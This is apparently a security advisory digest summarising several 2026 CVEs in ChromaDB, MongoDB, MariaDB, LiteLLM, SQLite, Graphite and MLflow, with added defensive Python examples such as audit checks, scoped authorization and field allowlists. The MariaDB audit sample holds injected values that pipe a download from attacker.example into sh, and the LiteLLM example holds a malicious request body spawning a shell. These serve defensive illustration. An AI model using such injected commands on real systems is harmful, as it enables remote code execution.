In ChromaDB Python versions 0.5.0 or later a high severity vulnerability CVE-2026-45831 was detected. This vulnerability allows an authenticated user to perform cross-tenant actions and gain unauthorized access to isolated data. This occurs because the SimpleRBACAuthorizationProvider evaluates whether a user holds a given permission, but fails to check which tenant, database, or collection that permission actually applies to. Consequently, attackers can bypass intended access restrictions across different tenant environments. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-45831.
In MongoDB versions 7.0.0 to before 7.0.35, 8.0.0 to before 8.0.24, 8.2.0 to before 8.2.10, and 8.3.0 to before 8.3.3 a medium severity vulnerability CVE-2026-9750 was detected. This vulnerability allows an authenticated user to crash the server (Denial of Service) or cause queries to return incorrect results. This occurs due to insufficient separation between user-controlled document fields and internal metadata during query execution: by inserting specifically crafted documents, an attacker can interfere with the processing of that internal metadata. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-9750.
In MariaDB Server versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1 a high severity vulnerability CVE-2026-48165 was detected. This vulnerability allows a high-privileged MariaDB user to execute arbitrary shell commands with the privileges of the mariadbd process on the Galera joiner node. This occurs because the values of the wsrep_sst_receive_address and wsrep_sst_donor global system variables are not handled safely when they are used during a state snapshot transfer (SST), so a user who is allowed to set them can influence what the joiner node executes. To address this issue, users should upgrade MariaDB Server to versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, or 12.3.2. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-48165.
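A quick audit check for the two variables named in the MariaDB entry, added here as an example (it is not MariaDB's code and not part of the advisory). It takes the name/value pairs that SHOW GLOBAL VARIABLES LIKE 'wsrep_sst%' returns and flags values that do not look like a plain host[:port] (for wsrep_sst_receive_address, whose default is AUTO) or a comma-separated list of node names (for wsrep_sst_donor). It assumes that values carrying shell syntax are the ones to worry about, which the entry above does not spell out; the sample values are constructed.

```python
"""Audit wsrep_sst_* variable values for shapes that should never appear in a healthy
cluster. Added example, not MariaDB code. Assumption: legitimate values are a host or
bracketed IPv6 address with an optional port, the literal AUTO, or a comma-separated
list of donor node names (a trailing comma means 'fall back to any donor')."""
import re

# host.name, 10.0.0.5 or [::1], optionally followed by :port
_RECEIVE_ADDRESS_RE = re.compile(r"^(?:[A-Za-z0-9.-]+|\[[0-9A-Fa-f:.]+\])(?::[0-9]{1,5})?$")
# node names separated by commas; empty string and trailing comma are allowed
_DONOR_RE = re.compile(r"^(?:[A-Za-z0-9_.-]+(?:,[A-Za-z0-9_.-]+)*)?,?$")


def is_safe_receive_address(value: str) -> bool:
    """True for AUTO or a host[:port]; anything with spaces, quotes, $(), ; | & etc. fails."""
    return value == "AUTO" or bool(_RECEIVE_ADDRESS_RE.match(value))


def is_safe_donor(value: str) -> bool:
    """True for an (optionally empty) comma-separated list of plain node names."""
    return bool(_DONOR_RE.match(value))


def audit_sst_variables(variables: dict[str, str]) -> list[str]:
    """Return the names of the variables whose values fail the shape check.
    `variables` is a name -> value mapping as read from SHOW GLOBAL VARIABLES."""
    checks = {
        "wsrep_sst_receive_address": is_safe_receive_address,
        "wsrep_sst_donor": is_safe_donor,
    }
    return [
        name for name, check in checks.items()
        if name in variables and not check(variables[name])
    ]


# Constructed sample rows: one healthy set of values, one that should be investigated.
CLEAN = {"wsrep_sst_receive_address": "10.0.0.5:4444", "wsrep_sst_donor": "node1,node2,"}
SUSPECT = {
    "wsrep_sst_receive_address": "10.0.0.5; curl http://attacker.example/x | sh",
    "wsrep_sst_donor": "$(id)",
}

if __name__ == "__main__":
    print("clean:", audit_sst_variables(CLEAN))
    print("suspect:", audit_sst_variables(SUSPECT))
```

Run it against the output of SHOW GLOBAL VARIABLES LIKE 'wsrep_sst%' on every node; a non-empty result is worth a look regardless of the server version, since the variables are writable by high-privileged users and a surprising value is itself a signal.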
In ChromaDB Python versions 0.5.0 through 1.5.9 inclusive a high severity vulnerability CVE-2026-45832 was detected. This vulnerability allows an attacker to bypass authorization controls and gain unauthorized access to data. This occurs because all V1 collection-level endpoints pass None for the tenant and database parameters to the authorization layer, so the scope of the request is never checked. By calling these V1 endpoints directly, attackers can circumvent the intended access restrictions. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-45832.
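The two ChromaDB entries above describe the same class of mistake from two sides: an authorizer that checks "does this user hold the permission" without checking "for which tenant, database or collection" (CVE-2026-45831), and callers that pass None for the scope so nothing can be checked (CVE-2026-45832). The following example, written for this page and not taken from Chroma's code, shows a permission-only check beside a scope-aware one that fails closed on a missing scope. The Scope, Grant and GRANTS names, the role table and the request shapes are assumptions made for the illustration.

```python
"""Scope-aware RBAC check: constructed illustration of the two Chroma authorization
bugs described above. Not Chroma's code; the types, the role table and the request
shapes are assumptions for the example."""
from dataclasses import dataclass
from typing import Optional


class Unauthorized(Exception):
    pass


@dataclass(frozen=True)
class Scope:
    tenant: Optional[str]
    database: Optional[str] = None
    collection: Optional[str] = None


@dataclass(frozen=True)
class Grant:
    action: str
    scope: Scope  # the resource the permission was granted for


# Constructed role table: alice may read collections only inside tenant acme, database prod.
GRANTS = {
    "alice": [Grant("collection:read", Scope("acme", "prod"))],
}


def permission_only_check(user: str, action: str) -> bool:
    """Vulnerable pattern (CVE-2026-45831): asks whether the user holds the permission
    at all and ignores which tenant/database/collection it was granted for."""
    return any(g.action == action for g in GRANTS.get(user, []))


def scoped_check(user: str, action: str, requested: Scope) -> bool:
    """Hardened pattern: the permission must exist *and* its scope must cover the
    requested resource. A missing tenant or database in the request is treated as
    unknown and fails closed, which is what the V1 endpoints in CVE-2026-45832 lacked."""
    if requested.tenant is None or requested.database is None:
        return False
    for g in GRANTS.get(user, []):
        if g.action != action:
            continue
        s = g.scope
        if s.tenant != requested.tenant:
            continue
        if s.database is not None and s.database != requested.database:
            continue
        if s.collection is not None and s.collection != requested.collection:
            continue
        return True
    return False


def authorize(user: str, action: str, requested: Scope) -> None:
    """Raise Unauthorized unless the scoped check passes."""
    if not scoped_check(user, action, requested):
        raise Unauthorized(f"{user} may not {action} on {requested}")


def demo() -> dict:
    """Decisions for three requests, so the difference between the checks is visible."""
    same_tenant = Scope("acme", "prod", "docs")
    other_tenant = Scope("globex", "prod", "docs")
    v1_style = Scope(None, None, "docs")  # what the V1 endpoints handed to the authorizer
    return {
        "permission_only_other_tenant": permission_only_check("alice", "collection:read"),
        "scoped_same_tenant": scoped_check("alice", "collection:read", same_tenant),
        "scoped_other_tenant": scoped_check("alice", "collection:read", other_tenant),
        "scoped_none_scope": scoped_check("alice", "collection:read", v1_style),
    }


if __name__ == "__main__":
    print(demo())
```

The first result is the cross-tenant read the permission-only check lets through; the last one is the point of the V1 bug: if an authorizer accepts None as a scope and compares it permissively, the caller decides whether scope is checked at all, so the authorizer has to refuse to decide when the scope is not supplied.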
In LiteLLM versions 1.74.2 to before 1.83.7 a medium severity vulnerability CVE-2026-42271 was detected. This vulnerability allows any authenticated user, including those with low-privileged internal-user keys, to execute arbitrary commands on the proxy host. This occurs because the MCP server preview endpoints (POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list) improperly accept and execute a full server configuration from the request body. When a stdio configuration containing command, args, and env fields is supplied, the endpoints spawn the specified command as a subprocess with the privileges of the proxy process, completely bypassing role-based access checks. To address this issue, users should upgrade LiteLLM to version 1.83.7. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-42271.
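The entry above is a case of an endpoint executing whatever configuration the caller sends. The following example, added for this page and not LiteLLM's own code, shows the shape of the vulnerable handler next to one that gates the request on role, rejects the fields that control what process is spawned, and resolves the server from an admin-managed registry instead. The proxy_admin role name, the REGISTERED_SERVERS registry and the request/response shapes are assumptions for the illustration.

```python
"""Gating a 'test this MCP server' endpoint. Constructed illustration of CVE-2026-42271;
not LiteLLM's code. Assumptions: the role name proxy_admin, the registry of servers an
admin configured out of band, and the request/response dict shapes."""
from typing import Any


class Forbidden(Exception):
    pass


# Constructed registry. Only these may be spawned or contacted; the stdio command,
# its arguments and its environment never come from a request body.
REGISTERED_SERVERS: dict[str, dict[str, Any]] = {
    "filesystem": {"transport": "stdio", "command": "mcp-filesystem", "args": ["/srv/data"]},
    "search": {"transport": "http", "url": "https://mcp.internal/search"},
}

# Fields that let a caller decide what runs on the proxy host and with what environment.
EXECUTION_KEYS = {"command", "args", "env"}


def vulnerable_handler(user_role: str, body: dict[str, Any]) -> dict[str, Any]:
    """The pattern described above: no role check, and a full server config from the
    request body is what gets executed. Returned here instead of spawned."""
    return {
        "would_spawn": body.get("command"),
        "args": body.get("args", []),
        "env": body.get("env", {}),
    }


def hardened_handler(user_role: str, body: dict[str, Any]) -> dict[str, Any]:
    """Role first, then refuse execution-controlling fields outright, then look the
    server up by id so the executed config is the admin's, not the caller's."""
    if user_role != "proxy_admin":
        raise Forbidden("only proxy admins may test MCP server connections")
    leaked = EXECUTION_KEYS & set(body)
    if leaked:
        raise ValueError(f"execution fields are not accepted in the request body: {sorted(leaked)}")
    server_id = body.get("server_id")
    if server_id not in REGISTERED_SERVERS:
        raise ValueError("unknown server_id")
    return {"resolved": REGISTERED_SERVERS[server_id]}


# Constructed request an internal-user key could send to the vulnerable endpoint.
MALICIOUS_BODY = {"transport": "stdio", "command": "sh", "args": ["-c", "id > /tmp/pwned"], "env": {}}

if __name__ == "__main__":
    print(vulnerable_handler("internal_user", MALICIOUS_BODY))
    try:
        hardened_handler("internal_user", MALICIOUS_BODY)
    except Forbidden as e:
        print("rejected:", e)
```

The order of the checks matters: rejecting the execution fields before any role lookup keeps the surface closed even if a role check is later misconfigured, and resolving by server_id means the only code path that spawns a process reads from the registry.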
In LiteLLM versions prior to 1.83.10 a high severity vulnerability CVE-2026-47102 was detected. This vulnerability allows an authenticated user, such as one with the org_admin role, to escalate their privileges and gain full administrative access to the platform. This occurs because the /user/update endpoint, while correctly restricting users to updating only their own account, fails to restrict which specific fields can be modified. As a result, an attacker can change their own user_role to proxy_admin, granting them unauthorized control over all users, teams, keys, models, and prompt history. To address this issue, users should upgrade LiteLLM to version 1.83.10. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-47102.
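The second LiteLLM entry is a mass-assignment problem: the ownership check is right, but every field in the body is written through. The example below, added for this page rather than taken from LiteLLM, shows that handler next to one with a field allowlist for non-admin callers. The user table, the org_admin and proxy_admin role names and the field names are assumptions for the illustration.

```python
"""Mass assignment on a self-service update endpoint and the allowlist that closes it.
Constructed illustration of CVE-2026-47102; not LiteLLM's code. Assumptions: the role
names, the field names and the in-memory user table."""
from typing import Any


class Forbidden(Exception):
    pass


# Fields a user may change on their own record. Everything else is admin-only.
SELF_UPDATABLE = {"user_email", "user_alias"}


def fresh_users() -> dict[str, dict[str, Any]]:
    """Constructed user table, rebuilt per call so each scenario starts clean."""
    return {
        "mallory": {"user_role": "org_admin", "user_email": "m@example.com"},
        "root": {"user_role": "proxy_admin", "user_email": "root@example.com"},
    }


def _resolve_target(caller: str, caller_role: str, body: dict[str, Any]) -> str:
    """Ownership check shared by both handlers: non-admins may only touch themselves."""
    target = body.get("user_id", caller)
    if target != caller and caller_role != "proxy_admin":
        raise Forbidden("may only update own account")
    return target


def vulnerable_update(caller: str, caller_role: str, body: dict[str, Any],
                      users: dict[str, dict[str, Any]]) -> dict[str, Any]:
    """Ownership is enforced, but every key in the body is written, user_role included."""
    target = _resolve_target(caller, caller_role, body)
    users[target].update({k: v for k, v in body.items() if k != "user_id"})
    return users[target]


def hardened_update(caller: str, caller_role: str, body: dict[str, Any],
                    users: dict[str, dict[str, Any]]) -> dict[str, Any]:
    """Same ownership check, plus: a non-admin may only write allowlisted fields."""
    target = _resolve_target(caller, caller_role, body)
    fields = {k: v for k, v in body.items() if k != "user_id"}
    if caller_role != "proxy_admin":
        blocked = set(fields) - SELF_UPDATABLE
        if blocked:
            raise Forbidden(f"fields not updatable by {caller_role}: {sorted(blocked)}")
    users[target].update(fields)
    return users[target]


# Constructed escalation request: the caller edits only their own record.
ESCALATION = {"user_id": "mallory", "user_role": "proxy_admin"}

if __name__ == "__main__":
    print(vulnerable_update("mallory", "org_admin", ESCALATION, fresh_users()))
    try:
        hardened_update("mallory", "org_admin", ESCALATION, fresh_users())
    except Forbidden as e:
        print("rejected:", e)
```

An allowlist is the right shape here rather than a denylist of sensitive fields: new privileged attributes added later (budgets, team membership, model access) are denied by default instead of being silently writable until someone remembers to block them.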
In SQLite versions before 3.53.2 a high severity vulnerability CVE-2026-11824 was detected. This vulnerability allows an attacker to cause a Denial of Service (crash) or potentially execute arbitrary code. This occurs due to a heap-based buffer overflow in the FTS5 full-text search extension (specifically within the fts5ChunkIterate() function). By supplying a specially crafted database with malicious continuation page metadata (where the szLeaf value is smaller than 4), an attacker can trigger an integer underflow. This results in an inflated remaining byte count during FTS5 MATCH query processing, so that attacker-controlled data is written past the end of a heap buffer. This vulnerability only affects applications compiled with the SQLITE_ENABLE_FTS5 flag. To address this issue, users should upgrade SQLite to version 3.53.2. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-11824.
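Because SQLite is usually embedded, the practical question for the entry above is which copy of it a given process links and whether that copy has FTS5 compiled in. The example below, added here and not part of the advisory or of SQLite, answers that for a Python interpreter's bundled library using the standard sqlite3 module (PRAGMA compile_options lists options without the SQLITE_ prefix, so ENABLE_FTS5 is what to look for) and keeps the decision in a pure function so it can be tested with fixed inputs. The two small functions at the end are a simplified model of the underflow the entry describes, with the 4-byte threshold taken from the text; the exact arithmetic inside fts5ChunkIterate() is not reproduced here.

```python
"""Is this process's SQLite affected by CVE-2026-11824? Added example; the decision
logic is a pure function, check_local_sqlite() applies it to the interpreter's own
library. The underflow model at the end is a simplification, not SQLite's code."""
import sqlite3

FIXED_VERSION = (3, 53, 2)
HEADER_BYTES = 4  # the advisory's threshold: szLeaf values below 4 trigger the underflow


def parse_version(s: str) -> tuple[int, ...]:
    """'3.45.1' -> (3, 45, 1), so versions compare numerically rather than as strings."""
    return tuple(int(p) for p in s.split("."))


def is_affected(version: str, compile_options: list[str]) -> bool:
    """Affected iff the library is older than 3.53.2 and FTS5 is compiled in.
    Accepts options with or without the SQLITE_ prefix."""
    opts = {o.upper().removeprefix("SQLITE_") for o in compile_options}
    return parse_version(version) < FIXED_VERSION and "ENABLE_FTS5" in opts


def check_local_sqlite() -> dict:
    """Read version and compile options from the library linked into this interpreter."""
    con = sqlite3.connect(":memory:")
    try:
        opts = [row[0] for row in con.execute("PRAGMA compile_options")]
    finally:
        con.close()
    return {
        "version": sqlite3.sqlite_version,
        "fts5": "ENABLE_FTS5" in opts,
        "affected": is_affected(sqlite3.sqlite_version, opts),
    }


def remaining_unchecked(sz_leaf: int) -> int:
    """Simplified model of the bug: subtracting the header size from an untrusted
    szLeaf in unsigned 32-bit arithmetic wraps when szLeaf < 4, giving a huge count
    that is then used as the number of bytes still to copy."""
    return (sz_leaf - HEADER_BYTES) & 0xFFFFFFFF


def remaining_checked(sz_leaf: int) -> int:
    """The check that is missing in the vulnerable path: refuse corrupt metadata."""
    if sz_leaf < HEADER_BYTES:
        raise ValueError(f"corrupt leaf page: szLeaf={sz_leaf} < {HEADER_BYTES}")
    return sz_leaf - HEADER_BYTES


if __name__ == "__main__":
    print(check_local_sqlite())
    print("szLeaf=2 unchecked ->", remaining_unchecked(2))
```

Note that Python's bundled SQLite is only one copy: applications that ship their own (via a wheel, a vendored amalgamation, or a system libsqlite3) need the same check run against that copy, and the exposure is only real where untrusted database files are opened and FTS5 MATCH queries are run over them.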
In Graphite versions before 1.3.15 a high severity vulnerability CVE-2026-50593 was detected. This vulnerability allows an attacker to cause an out-of-bounds memory write, potentially leading to arbitrary code execution, memory corruption, or a denial of service. This occurs due to an integer underflow in the slotat function, which fails to properly validate that an offset is within the allowed slot-map range when processing Graphite actions. To address this issue, users should upgrade Graphite to version 1.3.15. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-50593.
In MLflow versions up to 3.10.0 a low severity vulnerability CVE-2026-10803 was detected. This vulnerability may allow a local attacker to produce hash collisions and thereby undermine the integrity of dataset digests. This occurs because the dataset digest computation (the mlflow.data.digest_utils module, mlflow/data/digest_utils.py) uses a weak cryptographic hashing algorithm. Although the attack complexity is rated as high and exploitation is difficult, a proof of concept has been published. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-10803.